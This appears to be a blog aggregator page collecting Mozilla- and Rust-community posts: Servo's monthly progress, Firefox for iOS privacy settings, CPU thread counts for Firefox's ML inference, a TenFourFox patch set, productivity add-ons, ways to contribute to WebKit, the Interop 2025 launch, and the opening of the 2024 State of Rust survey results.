3 Regressions, 2 Improvements, 4 Mixed; 4 of them in rollups 50 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-19 - 2025-03-19 🦀

Virtual
Asia
Europe
North America
Oceania
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I have found that many automated code review tools, including LLMs, catch 10 out of 3 bugs.

Josh Triplett on r/rust

Despite a lamentable lack of suggestions, llogiq is properly pleased with his choice.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Servo BlogThis month in Servo: new webview API, relative colors, canvas buffs, and more!

Servo now supports several new web API features:

We’ve landed a bunch of HTMLCanvasElement improvements:

servoshell nightly showing relative oklch() colors, canvas toDataURL() with image/jpeg and image/webp, canvas toBlob(), the WGSLLanguageFeatures API, and the DOM tree of a custom element with a <slot>

Streams are a lot more useful now, with ReadableStreamBYOBReader now supporting read() (@Taym95, #35040), cancel(), close(), and releaseLock() (@Taym95, #34958).

Servo now passes 40.6% (+7.5pp) of enabled Shadow DOM tests, thanks to our landing support for the :host selector (@simonwuelker, #34870) and the <slot> element (@simonwuelker, #35013, #35177, #35191, #35221, #35137, #35222), plus improvements to event handling (@simonwuelker, #34788, #34884), script (@willypuzzle, #34787), style (@simonwuelker, @jdm, #35198, #35132), and the DOM tree (@simonwuelker, @Taym95, #34803, #34834, #34863, #34909, #35076).

Table layout is significantly better now, particularly in ‘table-layout: fixed’ (@Loirooriol, #35170), table sizing (@Loirooriol, @mrobinson, #34889, #34947, #35167), rowspan sizing (@mrobinson, @Loirooriol, #35095), interaction with floats (@Loirooriol, #35207), and ‘border-collapse’ layout (@Loirooriol, #34932, #34908, #35097, #35122, #35165) and painting (@Loirooriol, #34933, #35003, #35100, #35075, #35129, #35163).

As a result, Servo now passes 90.2% (+11.5pp) of enabled CSS tables tests, and of the tests that are in CSS 2, we now pass more than Blink and WebKit! We literally stood on the shoulders of giants here, because this would not have been possible without Blink’s robust table impl. Despite their age, tables are surprisingly underspecified, so we also needed to report several spec issues along the way (@Loirooriol).

Embedding

Servo aims to be an embeddable web engine, but so far it’s been a lot harder to embed Servo than it should be.

For one, configuring and starting Servo is complicated. We found that getting Servo running at all, even without wiring up input or handling resizes correctly, took over 200 lines of Rust code (@delan, @mrobinson, #35118). Embedders (apps) could only control Servo by sending and receiving a variety of “messages” and “events”, and simple questions like “what’s the current URL?” were impossible to answer without keeping track of extra state in the app.

Contrast this with WebKitGTK, where you can write a minimal kiosk app with a fully-functional webview in under 50 lines of C. To close that gap, we’ve started reworking our embedding API towards something more idiomatic and ergonomic, starting with the concept embedders care about most: the webview.

Our new webview API is controlled by calling methods on a WebView handle (@delan, @mrobinson, #35119, #35183, #35192), including navigation and user input. Handles will eventually represent the lifecycle of the webview itself; if you have one, the webview is valid, and if you drop them, the webview is destroyed.

Servo needs to call into the embedder too, and here we’ve started replacing the old EmbedderMsg API with a webview delegate (@delan, @mrobinson, #35211), much like the delegates in Apple’s WebKit API. In Rust, a delegate is a trait that the embedder can install its own impl for. Stay tuned for more on this next month!

Embedders can now intercept any request, not just navigation (@zhuhaichao518, #34961), and you can now identify the webview that caused an HTTP credentials prompt (@pewsheen, @mrobinson, #34808).

Other embedding improvements include:

Other changes

We’ve reworked Servo’s preferences system, making all prefs optional with reasonable defaults (@mrobinson, #34966, #34999, #34994). As a result:

  • The names of all preferences have changed; see the Prefs docs for a list
  • Embedders no longer need a prefs.json resource to get Servo running
  • Some debug options were converted to preferences (@mrobinson, #34998)

Devtools now highlights console.log() arguments according to their types (@simonwuelker, #34810).

Servo’s networking is more efficient now, with the ability to cancel fetches for navigation that contain redirects (@mrobinson, #34919) and cancel fetches for <video> and <media> when the document is unloaded (@mrobinson, #34883). Those changes also eliminate per-request IPC channels for navigation and cancellation respectively, and in the same vein, we’ve eliminated them for image loading too (@mrobinson, #35041).

We’ve continued splitting up our massive script crate (@jdm, #34359, #35157, #35169, #35172), which will eventually make Servo much faster to build.

A few crashes have been fixed, including when exiting Servo (@mukilan, #34917), when using the internal memory profiler (@jdm, #35058), and when running ResizeObserver callbacks (@willypuzzle, #35168).

For developers

We now run CI smoketests on OpenHarmony using a real device (@jschwe, @mukilan, #35006), increasing confidence in your changes beyond compile-time errors.

We’ve also tripled our self-hosted CI runner capacity (@delan, #34983, #35002), making concurrent Windows and macOS builds possible without falling back to the much slower GitHub-hosted runners.

Servo can’t yet run WebDriver-based tests on wpt.fyi, wpt.servo.org, or CI, because the servo executor for the Web Platform Tests does not support testdriver.js. servodriver does, though, so we’ve started fixing test regressions with that executor with the goal of eventually switching to it (@jdm, #34957, #34997).

Donations

Thanks again for your generous support! We are now receiving 3835 USD/month (−11.4% over December) in recurring donations. With this money, we’ve been able to expand our capacity for self-hosted CI runners on Windows, Linux, and macOS builds, halving mach try build times from over an hour to under 30 minutes!

Servo is also on thanks.dev, and already 21 GitHub users (+5 over December) that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.

3835 USD/month
10000

As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Conference talks

The Mozilla BlogSpring detox with Firefox for iOS

A hand holding a smartphone with a blooming flower growing from the screen, surrounded by sparkles, against an orange gradient background.

A fresh start isn’t just for your home — your iPhone or iPad deserves a privacy detox too. With Firefox for iOS, you can block hidden trackers, stop fingerprinting, and keep your browsing history more private with Enhanced Tracking Protection.

How Firefox for iOS protects you

Websites and advertisers often track your activity using cookies, fingerprinting and redirect trackers. Firefox’s Enhanced Tracking Protection helps detox your browsing experience by blocking these trackers, keeping your personal data safe from prying eyes.

Learn more about how Enhanced Tracking Protection works in this FAQ.

Privacy features built for iOS

✅ Blocks Social Media Trackers – Prevents social media platforms from monitoring your activity across different sites.
✅ Prevents Cross-Site Tracking – Stops advertisers from following your movements from one site to another.
✅ Blocks Cryptominers and Fingerprinters – Protects your device from unauthorized cryptocurrency mining and digital fingerprinting attempts.
✅ Customizable Protection Levels – Choose between Standard and Strict modes to balance protection and site functionality.
✅ Private Browsing Mode – Browse without saving history, cookies, or site data, ensuring your sessions remain confidential.
✅ Sync Across Devices – Use Firefox on your iPhone, iPad, and desktop while keeping your privacy settings intact.

How to check your privacy settings on Firefox for iOS

Make sure you’re getting the best privacy protection by following these steps on your iPhone or iPad:

  1. Open the Firefox app.
  2. Tap the menu (☰) button at the bottom of the screen.
  3. Select Settings, then tap Tracking Protection.
  4. Choose your desired protection level:
    • Standard: Blocks social media trackers, cross-site trackers, cryptominers, and fingerprinters.
    • Strict: Includes all Standard protections and also stops known tracking content, such as videos, ads, and other elements with tracking code. Pages load faster, but this setting may block some website functionality.

A cleaner, safer way to browse on iOS

Spring cleaning isn’t just about organizing your space—it’s about clearing out digital clutter too. With Firefox for iOS, you can enjoy a faster, safer browsing experience while blocking trackers that slow you down.

🌿 Give your privacy a fresh start — join the Spring Detox with Firefox today.

Firefox browser logo

Get Firefox

Get the browser that protects what’s important

The post Spring detox with Firefox for iOS appeared first on The Mozilla Blog.

The Mozilla BlogWhat is the best hardware concurrency for running inference on CPU?

In the Firefox AI Runtime, we can use multiple threads in the dedicated inference process to speed up execution times CPU. The WASM/JS environment can create a SharedArrayBuffer and run multiple threads against its content and distribute the load on several CPU cores concurrently.

Below is the time taken in seconds on a MacBook M1 Pro, which has 10 physical cores, using our PDF.js image-to-text model to generate an alt text, with different levels of concurrency:

graph showing the inference duration (Y) depending on the number of threads (X). 8 threads is faster with 800ms

So running several threads is a game-changer ! But using more and more threads will start to slow down execution time to a point where it will become slower than not using threads at all. 

So one question we have asked ourselves was: how can we determine the best number of threads ?

Physical vs logical cores

According to our most recent public data report, on desktop, 81% of our users are equipped with an Intel CPU, 14% with AMD and the rest are mostly Apple devices.

All modern CPUs provide more logical cores (also called “threads”) than physical cores. This happens due to technologies like Intel’s Hyper-Threading. Or AMD’s Simultaneous Multithreading (SMT).

For example, the Intel Core i9-10900K chip has 10 physical cores and 20 logical cores.

When you spin up threads equal to the number of logical cores, you might see performance gains, especially when tasks are I/O bound or if the CPU can effectively interleave instructions.

However, for compute-bound tasks (like heavy ML inference), having more threads than physical cores can lead to diminishing returns, or even performance drops, due to factors like thread scheduling overhead and cache contention.

Not all cores are created equal

On Apple Silicon, you don’t just have a quantity of cores; you have different kinds of cores. Some are high-performance cores designed for heavy lifting, while others are efficiency cores that are optimized for lower power consumption.

For instance, Apple M1 Pro chips have a combination of high-performance (8) and efficiency cores (2). The physical cores might total 10, but each performance core is designed for heavy-duty tasks, while efficiency cores typically handle background tasks that are less demanding. 

When your machine is under load with ML tasks, it’s often better to fully utilize the high-performance cores and leave some breathing room for the efficiency cores to handle background or system processes. 

Similarly, Intel’s processors have different cores, most notably starting with their 12th-generation “Alder Lake” architecture. 

These chips feature Performance-cores (P-cores) designed for demanding, single-threaded tasks, and Efficient-cores (E-cores) aimed at background or less intensive workloads. The P-cores can leverage Intel’s Hyper-Threading technology (meaning each P-core can run two logical threads), while E-cores typically run one thread each. This hybrid approach enables the CPU to optimize power usage and performance by scheduling tasks on the cores best suited for them. Like Apple Silicon’s you’d typically want to maximize utilization of the higher-performance P-cores, while leaving some headroom on the E-cores for system processes. 

Android is close to Apple Silicon’s architecture, as most devices are using ARM’s big.LITTLE (or DynamIQ) architecture – with 2 types of cores: “big” and “LITTLE”.

On mobile Qualcomm’s CPU, there can be three types: “Prime”, “Performance” and “Efficiency”. Most recently, some phones like Samsung Galaxy S24 have gained a fourth kind of core (Exynos 2400) allowing even more combinations.

To summarize, all CPU makers have cores dedicated to performance, and cores for efficiency: 

  • Performance: “P-Core”, “big”, “Prime”, “Performance”
  • Efficiency: “E-Core”, “LITTLE”, “Efficiency”

By combining high-efficiency and high-performance cores, Apple Silicon, Androids, and Intel based devices can strike a better balance between power consumption and raw compute power, depending on the demands of the workload.

But if you try to run all cores (performance + efficiency) at maximum capacity, you may see:

  1. Less optimal thread scheduling, because tasks will bounce between slower efficiency cores and faster performance cores.
  2. Contention for shared resources like the memory bus, cache.
  3. And in extreme cases: thermal throttling if the system overheats, and reaches its Thermal Design Point, in which case the clock speed is throttled to cool down the system. 

This is why simply setting the thread count to “all cores, all the time” can be suboptimal for performance.

AMD on the other hand, does not have efficiency cores. Some CPUs like the Ryzen 5 8000 combine two sizes of cores Zen 4 and Zen 4c, but the latter is not an efficiency core and can also be used to run heavy-duty tasks.

navigator.hardwareConcurrency

In a browser, there is a single and simple API you can call: navigator.hardwareConcurrency

This returns the number of logical cores available. Since it’s the only API available on the web, many libraries (including the one we vendor: onnxruntime) default to using navigator.hardwareConcurrency as a baseline for concurrency.

It’s bad practice to use that value directly as it might overcommit threads as we’ve explained in the previous sections. It’s also not aware of the current system’s activity.

For that reason, ONNX formula takes the number of logical cores divided by two and will never set it higher than 4:

Math.min(4, Math.ceil((navigator.hardwareConcurrency || 1) / 2));

That formula works out ok in general, but will not take advantage of all the cores for some devices. For instance, on an Apple M1 Pro, ML tasks could use a concurrency level up to 8 cores instead of 4.

On the other end of the spectrum, a chip like Intel’s i3-1220p that we use in our CI to run tests in Windows 11, which reflects better what our users have – see our hardware section in our Firefox Public Data Report.  

It has 12 logical cores and 10 physical cores that are composed of 8 efficient cores and 2 performance cores. ONNX formula for that chip means we would run with 4 threads, where 2 would be a better value.

navigator.hardwareConcurrency is a good starting point, but it’s just a blunt instrument. It won’t always yield the true “best” concurrency for a given device and a given workload.

MLUtils.getOptimalCPUConcurrency

While it’s impossible to get the best value at any given time without considering the system activity as a whole, looking at the number of physical cores and not using “efficiency” cores, can help to get to a better value.

Llama.cpp for instance is looking at the number of physical cores to decide for concurrency, with a few twists:

  • On any x86_64, it will return the number of performance cores
  • On Android, and any aarch64-based devices like Apple Silicon  it will return the number of performance cores for tri-layered chips.

We’ve implemented something very similar in a C++ API that can be used via XPIDL in our inference engine:

NS_IMETHODIMP MLUtils::GetOptimalCPUConcurrency(uint8_t* _retval) {
  ProcessInfo processInfo = {};
  if (!NS_SUCCEEDED(CollectProcessInfo(processInfo))) {
    return NS_ERROR_FAILURE;  
  }
  #if defined(ANDROID)
    // On android, "big" and "medium" cpus can be used.
    uint8_t cpuCount = processInfo.cpuPCount + processInfo.cpuMCount;
  #else
  # ifdef __aarch64__
    // On aarch64 (like macBooks) we want to avoid efficient cores and stick with "big" cpus.
    uint8_t cpuCount = processInfo.cpuPCount;
  # else
    // on x86_64 we're always using the number of physical cores.
    uint8_t cpuCount = processInfo.cpuCores;
  # endif
  #endif
  *_retval = cpuCount;
  return NS_OK;
}

This function is then straightforward to use from JS shipped within Firefox to configure concurrency when we run inference:

let mlUtils = Cc["@mozilla.org/ml-utils;1"].createInstance(Ci.nsIMLUtils);
const numThreads = mlUtils.getOptimalCPUConcurrency();

We’ve moved away from using navigator.hardwareConcurrency, and we’re now using this new API.

Conclusion

In our quest to find the optimal number of threads, we’re closer to reality now, but there are other factors to consider. The system will use the CPU for other applications so it’s still possible to overload it.

Using more threads is also going to use more memory in our WASM environment, which can become a real issue. Depending on the workload, each additional thread can add up to 100MiB of physical memory usage in our runtime. We’re working on reducing this overhead but on devices that don’t have a lot of memory, limiting concurrency is still our best option.

For our Firefox ML features, we are using a variety of hardware profiles in our performance CI to make sure that we try them on devices that are close to what our users have. The list of devices we have is going to grow in the next few months to make sure we cover the whole spectrum of CPUs. We’ve started collecting and aggregating metrics on a dashboard that helps us understand what can be expected when our users run our inference engine.

The hardware landscape is also evolving a lot. For example, the most recent Apple devices introduced a new instruction set, called AMX, which used to be proprietary, and gave a significant boost compared to Neon. That has now been replaced by an official API called SME. Similarly, some phones are getting more core types, which could impact how we calculate the number of cores to use. Our current algorithm could be changed the day we leverage these new APIs and hardware in our backend.

Another aspect we have not discussed in this post is using GPU or even more specialized units like NPUs, to offload our ML tasks, which will be a post on its own.

The post What is the best hardware concurrency for running inference on CPU? appeared first on The Mozilla Blog.

Cameron KaiserFebruary patch set for TenFourFox

I was slack on doing the Firefox 128ESR platform rebase for TenFourFox, but I finally got around tuit, mostly because I've been doing a little more work on the Quad G5 and put some additional patches in to scratch my own itches. (See, this is what I mean by "hobby mode.")

The big upgrade is a substantial overhaul of Reader Mode to pick up interval improvements in Readability. I remind folks that I went all-in on Reader Mode for a reason: it's lightweight, it makes little demands of our now antiquated machines (and TenFourFox's antiquated JavaScript runtime), and it renders very, very fast. That's why, for example, you can open a link directly in Reader Mode (right-click, it's there in the menu), the browser defaults to "sticky" Reader Mode where links you click in an article in Reader Mode stay in Reader Mode (like Las Vegas) until you turn it off from the book icon in the address bar, and you can designate certain sites to always open in Reader Mode, either every page or just subpages in case the front page doesn't render well — though that's improved too. (You can configure that from the TenFourFox preference pane. All of these features are unique to TenFourFox.) I also made some subtle changes to the CSS so that it lays out wider, which was really my only personal complaint; otherwise I'm an avid user. The improvements largely relate to better byline and "fluff" text detection as well as improved selection of article inline images. Try it. You'll like it.

I should note that Readability as written no longer works directly on TenFourFox due to syntactic changes and I had to do some backporting. If a page suddenly snaps to the non-Reader view, there was an error. Look in the Browser console for the message and report it; it's possible there is some corner I didn't hit with my own testing.

In addition, there are updates to the ATSUI font blacklist (and a tweak to CFF font table support) and a few low-risk security patches that likely apply to us, as well as refreshed HSTS pins, TLS root certificates, EV roots, timezone data and TLDs. I have also started adding certain AI-related code to the nuisance JavaScript block list as well as some new adbot host aliases I found. Those probably can't run on TenFourFox anyway (properly if at all), but now they won't even be loaded or parsed.

The source code can be downloaded from Github (at the command line you can also just do git clone https://github.com/classilla/tenfourfox.git) and built in the usual way. Remember that these platform updates require a clobber, so you must build from scratch. I was asked about making TenFourFox a bit friendlier with Github; that's a tall order and I'm still thinking about how, but at least the wiki is readable currently even if it isn't very pretty.

Firefox Add-on ReviewsSupercharge your productivity with a Firefox extension

With more work and education happening online (and at home) you may find yourself needing new ways to juice your productivity. From time management to organizational tools and more, the right Firefox extension can give you an edge in the art of efficiency. 

I need help saving and organizing a lot of web content 

Gyazo

Capture, save, and share anything you find on the web. Gyazo is a great tool for personal or collaborative record keeping and research. 

Clip entire pages or just pertinent portions. Save images or take screenshots. Gyazo makes it easy to perform any type of web clipping action by either right-clicking on the page element you want to save or using the extension’s toolbar button. Everything gets saved to your Gyazo account, making it accessible across devices and collaborative teams. 

On your Gyazo homepage you can easily browse and sort everything you’ve clipped; and organize everything into shareable topics or collections.

<figcaption class="wp-element-caption">With its minimalist pop-up interface, Gyazo makes it easy to clip elements, sections, or entire web pages. </figcaption>

Evernote Web Clipper

Similar to Gyazo, Evernote Web Clipper offers a kindred feature set—clip, save, and share web content—albeit with some nice user interface distinctions. 

Evernote places emphasis on making it easy to annotate images and articles for collaborative purposes. It also has a strong internal search feature, allowing you to search for specific words or phrases that might appear across scattered groupings of clipped content. Evernote also automatically strips out ads and social widgets on your saved pages. 

Print Edit WE

If you need to save or print an important web page — but it’s mucked up with a bunch of unnecessary clutter like ads, sidebars, and other peripheral content — Print Edit WE lets you easily remove those unwanted elements.

Along with a host of great features like the option to save web pages as either HTML or PDF files, automatically delete graphics, and the ability to alter text or add notes, Print Edit WE also provides an array of productivity optimizations like keyboard shortcuts and mouse gestures. This is the ideal productivity extension for any type of work steeped in web research and cataloging.

Focus! Focus! Focus!

Anti-distraction and decluttering extensions can be a major boon for online workers and students… 

Block Site 

Do you struggle avoiding certain time-wasting, productivity-sucking websites? With Block Site you can enforce restrictions on sites that tempt you away from good work habits. 

Just list the websites you want to avoid for specified periods of time (certain hours of the day or some days entirely, etc.) and Block Site won’t let you access them until you’re out of the focus zone. There’s also a fun redirection feature where you’re automatically redirected to a more productive website anytime you try to visit a time waster 

<figcaption class="wp-element-caption">Give yourself a custom message of encouragement (or scolding?) whenever you try to visit a restricted site with Block Site</figcaption>

LeechBlock NG

Very similar in function to Block Site, LeechBlock NG offers a few intriguing twists beyond standard site-blocking features. 

In addition to blocking sites during specified times, LeechBlock NG offers an array of granular, website-specific blocking abilities—like blocking just portions of websites (e.g. you can’t access the YouTube homepage but you can see video pages) to setting restrictions on predetermined days (e.g. no Twitter on weekends) to 60-second delayed access to certain websites to give you time to reconsider that potentially productivity killing decision. 

Tomato Clock

A simple but highly effective time management tool, Tomato Clock (based on the Pomodoro technique) helps you stay on task by tracking short, focused work intervals. 

The premise is simple: it assumes everyone’s productive attention span is limited, so break up your work into manageable “tomato” chunks. Let’s say you work best in 40-minute bursts. Set Tomato Clock and your browser will notify you when it’s break time (which is also time customizable). It’s a great way to stay focused via short sprints of productivity. The extension also keeps track of your completed tomato intervals so you can track your achieved results over time.

Tabby – Window & Tab Manager

Are you overwhelmed by lots of open tabs and windows? Need an easy way to overcome desktop chaos? Tabby – Window & Tab Manager to the rescue.

Regain control of your ever-sprawling open tabs and windows with an extension that lets you quickly reorganize everything. Tabby makes it easy to find what you need in a chaotic sea of open tabs — you can not only word/phrase search for the content your looking for, but Tabby also has a visual preview feature so you can get a look at each of your open tabs without actually navigating to them. And whenever you need a clean slate but want to save your work, you can save and close all of your open tabs with a single mouse click and return to them later.

<figcaption class="wp-element-caption">Access all of Tabby’s features in one convenient pop-up. </figcaption>

Tranquility Reader

Imagine a world wide web where everything but the words are stripped away—no more distracting images, ads, tempting links to related stories, nothing—just the words you’re there to read. That’s Tranquility Reader

Simply hit the toolbar button and instantly streamline any web page. Tranquility Reader offers quite a few other nifty features as well, like the ability to save content offline for later reading, customizable font size and colors, add annotations to saved pages, and more. 

We hope some of these great extensions will give your productivity a serious boost! Fact is there are a vast number of extensions out there that could possibly help your productivity—everything from ways to organize tons of open tabs to translation tools to bookmark managers and more. 

Karl DubostSome Ways To Contribute To WebKit and Web Interoperability

Graffiti of a robot on a wall with buildings in the background.

Someone asked me recently how to contribute to the WebKit project and more specifically how to find the low hanging fruits. While some of these are specific to WebKit, they can be easily applied to other browsers. Every browser engines projects have more bugs than they can handle with their teams.

In no specific orders, some ideas for contributing.

Curate Old Bugs on the bug tracker

  1. Go through old bugs of bugs.webkit.org.
  2. Try to understand what the bug is about.
  3. Create simplified test case when there is none and add them as an attachment.
  4. If they show differences in between the browsers, take a screenshot when it’s visual in Safari (WebKit), Firefox (Gecko), Chrome (Blink).
  5. If there is no difference in between browsers, CC: me on the bug, and probably we will be able to close it.

This might help reveal some old fixable bug or make it easier to fix it for another engineer. Some of them might be easy enough that you can start fix them yourself.

Find Out About Broken Stuff On WPT.

  1. Dive into all the bugs which fail in Safari, but pass in Firefox and/or Chrome. (You can do similar search for things failing in Chrome or failing in Firefox.)
  2. Understand what the tests is doing. You can check this with the WPT.live links and/or the associated commit.
  3. Check if the test is not broken and makes sense.
  4. Check if there is an associated bug on bugs.webkit.org. If not, open a new one.

FIXME Hunt Inside WebKit Code

  1. List all the FIXME which are flagged in the WebKit Source code.
  2. Not all of them are easy to fix, but some might be low hanging fruit. That will require to dive in the source code and understand it.
  3. Open a new bug on bugs.webkit.org if not yet existing.
  4. Eventually propose a patch.

Tests WebKit Quirks

  1. There are a number Quirks in the WebKit project. These are in place to hotfix websites not doing the right thing.
  2. Sometimes these Quirks are not needed anymore. The site has made a silent fix. They didn't tell us about it.
  3. They need to be retested and flagged when there are not necessary anymore. This can lead to patches on removing the quirk when it is not needed anymore.
  4. Some of these quirks do not have the remove quirk bug counterpart. It would be good to create the bug for them. Example of a Remove Quirk Bug.

Triage Incoming Bugs On Webcompat.Com For Safari

  1. Time to time there are bugs reported on webcompat.com for Safari.
  2. They require to be analyzed and understood.
  3. Sometimes, a new bug needs to be opened on bugs.webkit.org

Again, this is strongly explaining how to help from the side of WebKit. But these type of participation can be easily transposed for Gecko and Blink. If you have other ideas for fixing bugs, let me know.

Otsukare!

Hacks.Mozilla.OrgLaunching Interop 2025

Launching Interop 2025

The Interop Project is a collaboration between browser vendors and other platform implementors to provide users and web developers with high quality implementations of the web platform.

Each year we select a set of focus areas representing key areas where we want to improve interoperability. Encouraging all browser engines to prioritize common features ensures they become usable for web developers as quickly as possible.

Progress in each engine and the overall Interop score are measured by tracking the pass rate of a set of web-platform tests for each focus area using the Interop dashboard.

Interop 2024

Before introducing the new focus areas for this year, we should look at the successes of Interop 2024.

The Interop score, measuring the percentage of tests that pass in all of the major browser engines, has reached 95% in latest browser releases, up from only 46% at the start of the year. In pre-release browsers it’s even higher — over 97%. This is a huge win that shows how effective Interop can be at aligning browsers with the specifications and each other.

Each browser engine individually achieved a test pass score of 98% in stable browser releases and 99% in pre-release, with Firefox finishing slightly ahead with 98.8% in release and 99.1% in Nightly.

For users, this means features such as requestVideoFrameCallback, Declarative Shadow DOM, and Popover, which a year ago only had limited availability, are now implemented interoperably in all browsers.

Interop 2025

Building on Interop 2024’s success, we are excited to continue the project into 2025. This year we have 19 focus areas; 17 new and 2 from previous years. A full description of all the focus areas is available in the Interop repository.

From 2024 we’re carrying forward Layout (really “Flexbox and Grid”), and Pointer and Mouse Events. These are important platform primitives where the Interop project has already led to significant interoperability improvements. However, with technologies that are so fundamental to the modern web we think it’s important to set ambitious goals and continue to prioritize these areas, creating rock solid foundations for developers to build on.

The new focus areas represent a broad cross section of the platform. Many of them — like Anchor Positioning and View Transitions — have been identified from clear developer demand in surveys such as State of HTML and State of CSS. Inclusion in Interop will ensure they’re usable as soon as possible.

In addition to these high profile new features, we’d like to highlight some lesser-known focus areas and explain why we’re pleased to see them in Interop.

Storage Access

At Mozilla user privacy is a core principle. One of the most common methods for tracking across the web is via third-party cookies. When sites request data from external services, the service can store data that’s re-sent when another site uses the same service. Thus the service can follow the user’s browsing across the web.

To counter this, Firefox’s “Total Cookie Protection” partitions storage so that third parties receive different cookie data per site and thus reduces tracking. Other browsers have similar policies, either by default or in private browsing modes.

However, in some cases, non-tracking workflows such as SSO authentication depend on third party cookies. Storage partitioning can break these workflows, and browsers currently have to ship site-specific workarounds. The Storage Access API solves this by letting sites request access to the unpartitioned cookies. Interop here will allow browsers to advance privacy protections without breaking critical functionality.

Web Compat

The Web Compat focus area is unique in Interop. It isn’t about one specific standard, but focuses on browser bugs known to break sites. These are often in older parts of the platform with long-standing inconsistencies. Addressing these requires either aligning implementations with the standard or, where that would break sites, updating the standard itself.

One feature in the Web Compat focus area for 2025 is CSS Zoom. Originally a proprietary feature in Internet Explorer, it allowed scaling layout by adjusting the computed dimensions of elements at a time before CSS transforms. WebKit reverse-engineered it, bringing it into Blink, but Gecko never implemented it, due to the lack of a specification and the complexities it created in layout calculations.

Unfortunately, a feature not being standardised doesn’t prevent developers from using it. Use of CSS Zoom led to layout issues on some sites in Firefox, especially on mobile. We tried various workarounds and have had success using interventions to replace zoom with CSS transforms on some affected sites, but an attempt to implement the same approach directly in Gecko broke more sites than it fixed and was abandoned.

The situation seemed to be at an impasse until 2023 when Google investigated removing CSS Zoom from Chromium. Unfortunately, it turned out that some use cases, such as Microsoft Excel Online’s worksheet zoom, depended on the specific behaviour of CSS Zoom, so removal was not feasible. However, having clarified the use cases, the Chromium team was able to propose a standardized model for CSS Zoom that was easier to implement without compromising compatibility. This proposal was accepted by the CSS WG and led to the first implementation of CSS Zoom in Firefox 126, 24 years after it was first released in Internet Explorer.

With Interop 2025, we hope to bring the story of CSS Zoom to a close with all engines finally converging on the same behaviour, backed by a real open standard.

WebRTC

Video conferencing is now an essential feature of modern life, and in-browser video conferencing offers both ease of use and high security, as users are not required to download a native binary. Most web-based video conferencing relies on the WebRTC API, which offers high level tools for implementing real time communications. However, WebRTC has long suffered from interoperability issues, with implementations deviating from the standards and requiring nonstandard extensions for key features. This resulted in confusion and frustration for users and undermined trust in the web as a reliable alternative to native apps.

Given this history, we’re excited to see WebRTC in Interop for the first time. The main part of the focus area is the RTCRtpScriptTransform API, which enables cross browser end-to-end encryption. Although there’s more to be done in the future, we believe Interop 2025 will be a big step towards making WebRTC a truly interoperable web standard.

Removing Mutation Events

The focus area for Removing Mutation Events is the first time Interop has been used to coordinate the removal of a feature. Mutation events fire when the DOM changes, meaning the event handlers run on the critical path for DOM manipulation, causing major performance issues, and significant implementation complexity. Despite the fact that they have been implemented in all engines, they’re so problematic that they were never standardised. Instead, mutation observers were developed as a standard solution for the use cases of mutation events without their complexity or performance problems. Almost immediately after mutation observers were implemented, a Gecko bug was filed:

“We now have mutation observers, and we’d really like to kill support for mutation events at some point in the future. Probably not for a while yet.”

That was in 2012. The difficulty is the web’s core commitment to backwards compatibility. Removing features that people rely on is unacceptable. However, last year Chromium determined that use of mutation events had dropped low enough to allow a “deprecation trial“, disabling mutation events by default, but allowing specific sites to re-enable them for a limited time.

This is good news, but long-running deprecation trials can create problems for other browsers. Disabling the feature entirely can break sites that rely on the opt-out. On the other hand we know from experience that some sites actually function better in a browser with mutation events disabled (for example, because they are used for non-critical features, but impact performance).

By including this removal in Interop 2025, we can ensure that mutation events are fully removed in 2025 and end the year with reduced platform complexity and improved web performance.

Interop Investigations

As well as focus areas, the Interop project also runs investigations aimed at long-term interoperability improvements to areas where we can’t measure progress using test pass rates. For example Interop investigations can be looking to add new test capabilities, or increase the test coverage of platform features.

Accessibility Investigation

The accessibility testing started as part of Interop 2023. It has added APIs for testing accessible name and computed role, as well as more than 1000 new tests. Those tests formed the Accessibility focus area in Interop 2024, which achieved an Interop score of 99.7%.

In 2025 the focus will be expanding the testability of accessibility features. Mozilla is working on a prototype of AccessibleNode; an API that enables verifying the shape of the accessibility tree, along with its states and properties. This will allow us to test the effect of features like CSS display: contents or ::before/::after on the accessibility tree.

Mobile Testing Investigation

Today, all Interop focus areas are scored in desktop browsers. However, some features are mobile-specific or have interoperability challenges unique to mobile.

Improving mobile testing has been part of Interop since 2023, and in that time we’ve made significant progress standing up mobile browsers in web-platform-tests CI systems. Today we have reliable runs of Chrome and Firefox Nightly on Android, and Safari runs on iOS are expected soon. However, some parts of our test framework were written with desktop-specific assumptions in the design, so the focus for 2025 will be on bringing mobile testing to parity with desktop. The goal is to allow mobile-specific focus areas in future Interop projects, helping improve interoperability across all device types.

Driving the Web Forward

The unique and distinguishing feature of the web platform is its basis in open standards, providing multiple implementations and user choice. Through the Interop project, web platform implementors collaborate to ensure that these core strengths are matched by a seamless user experience across browsers.

With focus areas covering some of the most important new and existing areas of the modern web, Interop 2025 is set to deliver some of the biggest interoperability wins of the project so far. We are confident that Firefox and other browsers will rise to the challenge, providing users and developers with a more consistent and reliable web platform.

Partner Announcements

The post Launching Interop 2025 appeared first on Mozilla Hacks - the Web developer blog.

The Rust Programming Language Blog2024 State of Rust Survey Results

Hello, Rustaceans!

The Rust Survey Team is excited to share the results of our 2024 survey on the Rust Programming language, conducted between December 5, 2024 and December 23, 2024. As in previous years, the 2024 State of Rust Survey was focused on gathering insights and feedback from Rust users, and all those who are interested in the future of Rust more generally.

This ninth edition of the survey surfaced new insights and learning opportunities straight from the global Rust language community, which we will summarize below. In addition to this blog post, we have also prepared a report containing charts with aggregated results of all questions in the survey.

